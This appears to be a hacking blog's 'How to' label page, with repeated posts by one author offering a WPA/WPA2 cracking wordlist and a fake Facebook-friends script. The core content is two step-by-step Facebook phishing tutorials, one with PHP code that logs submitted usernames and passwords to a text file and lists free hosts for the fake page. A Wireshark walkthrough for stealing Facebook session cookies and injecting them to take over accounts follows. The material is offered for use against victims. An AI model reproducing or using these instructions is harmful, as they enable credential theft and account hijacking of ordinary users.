Have you ever wondered just how some people really get, what seems like, full use of their computer? Sure we all played Minesweeper and wrote the occasional Word document when we first started out using computers. Nowadays computers are a regular part of everyday life. From playing games to communicating with friends and family half way around the globe. Computers are really useful tools, but, all tools can be used in different ways. Here’s a quick top 10 count down on a few tips and info that’ll make your life easier in Windows 7. We’ll count down from 10.
Showing posts with label How to. Show all posts
Showing posts with label How to. Show all posts
Dec 26, 2014
Dec 24, 2014
Download WPA/WPA2-PSK dictionary wordlist [Compressed 4.8GB / Extracted size 39.1GB ]
Previously we have uploaded a wordlist which is 150 mb, Some users may not be able to successfully crack the wifi passwords using it, since it's a small wordlist. Today, We are uploading a HUGE dictionary wordlist which it's actual size is 39.1 GB, compressed to a size of 4.8 GB in .zip format. with this wordlist you will get 100% success rate.
Dec 23, 2014
How to add unlimited friends on facebook instantly for free!
Have you wondered how you can get unlimited facebook friends on facebook? Have you thought of getting 5000 instant friends on facebook?
Well, Don't worry! We have just the solution for you. In this post, We will be writing a post on how to get instant 5000 friends on facebook with a simple script/ website. It's 100% safe and has been tested by Top one admins. It's the easiest way to gain facebook fame and to get likes and comments to you pictures with 5000 friends on your friends list. Free unlimited facebook friends.
Well, Don't worry! We have just the solution for you. In this post, We will be writing a post on how to get instant 5000 friends on facebook with a simple script/ website. It's 100% safe and has been tested by Top one admins. It's the easiest way to gain facebook fame and to get likes and comments to you pictures with 5000 friends on your friends list. Free unlimited facebook friends.
Jun 26, 2013
Making facebook phishing tutorial.
Making facebook phishing tutorial.
In my previous article I taught you people how to make a Phishing site. ( The articles is here ). Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.
Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)
Step 2: Now Goto your email account that you gave and confirm your account with confirmation link
Step 3: Now Download this FILE (http://adf.ly/Lytss ) UPDATED LINK .
Step 3: Now Download this FILE (http://adf.ly/Lytss ) UPDATED LINK .
Step 5: Now when you are logged into your account click on the Go to Cpanel in front of your domain that you had registered, and then Go to File Manager under Files and log into it.
Step 6: Now Click on the Public_html.
Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.
Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.
NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:
http://www.yoursitesadress.p4o.net/lol.html
If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4s
PS:> If www.p4o.net didn't worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com
NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:
http://www.yoursitesadress.p4o.net/lol.html
If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4s
PS:> If www.p4o.net didn't worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com
Post by : Zayaan Ibrahim
Making a facebook Phishing site !
The way s the easiest and most commonly use way of hacking a Facebook account.
Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
NOW save this as hello.php
Step7 : now make a account on t35.com and Upload
Login.html
hello.php
lol.txt
For A DETAILED way of uploading the Phishing site Visit my article : http://www.topone2u.blogspot.com/2013/06/making-facebook-phishing-tutorial.html
NOTE: You ahve to make the other person enter his password and you can get the password by downloading the lol.txt file from your t35.com account by cPanel.
Post by : Zayaan Ibrahim
Facebook Cookie Stealing And Session Hijacking
Facebook Cookie Stealing And Session Hijacking
Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing , due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep (On a Wifi Network Only), which I won't be explaining here because I have already written it before in my post Facebook Hacking Made Easy With Firesheep
In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to hack your facebook account, Before reading this tutorial I would recommend you to part1, part2 and part 3 of my Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here.
Facebook Authentication Cookies
The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Step 1 - First of all download wireshark from the official website and install it.
Step 2 - Next open up wireshark click on analyze and then click on interfaces.
Step 3 - Next choose the appropriate interface and click on start.
In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to hack your facebook account, Before reading this tutorial I would recommend you to part1, part2 and part 3 of my Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here.
- Gmail Cookie Stealing And Session Hijacking Part 1
- Gmail Cookie Stealing And Session Hijacking Part 2
- Gmail Cookie Stealing And Session Hijacking Part 3
Facebook Authentication Cookies
The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;How To Steal Facebook Session Cookies And Hijack An Account?
An attacker can use variety of methods in order to steal your Facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.
If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.
In the example below I will be explaining how an attacker can capture your authentication cookies and hack your Facebook account with wireshark.
If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.
In the example below I will be explaining how an attacker can capture your authentication cookies and hack your Facebook account with wireshark.
Step 1 - First of all download wireshark from the official website and install it.
Step 2 - Next open up wireshark click on analyze and then click on interfaces.
Step 3 - Next choose the appropriate interface and click on start.
Step 4 - Continue sniffing for around 10 minutes.
Step 6 - Next set the filter to http.cookie contains "datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.
Step 7 - Next right click on it and goto Copy - Bytes - Printable Text only.
Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.com and make sure that you are not logged in.
Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.
Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.
Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.
Countermeasures
The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won't be able to do any thing with your cookies.
Post by : Zayaan Ibrahim
How to remotely shutdown your friends computer using command prompt.
You can shutdown your friend's computer through chating. This is very simple and cool trick. Kindly follow these steps :-
If you have any questions or queries , Please comment your questions and queries below :)
Post by : Zayaan Ibrahim
Subscribe to:
Posts (Atom)




.jpg)
.jpg)


.png)




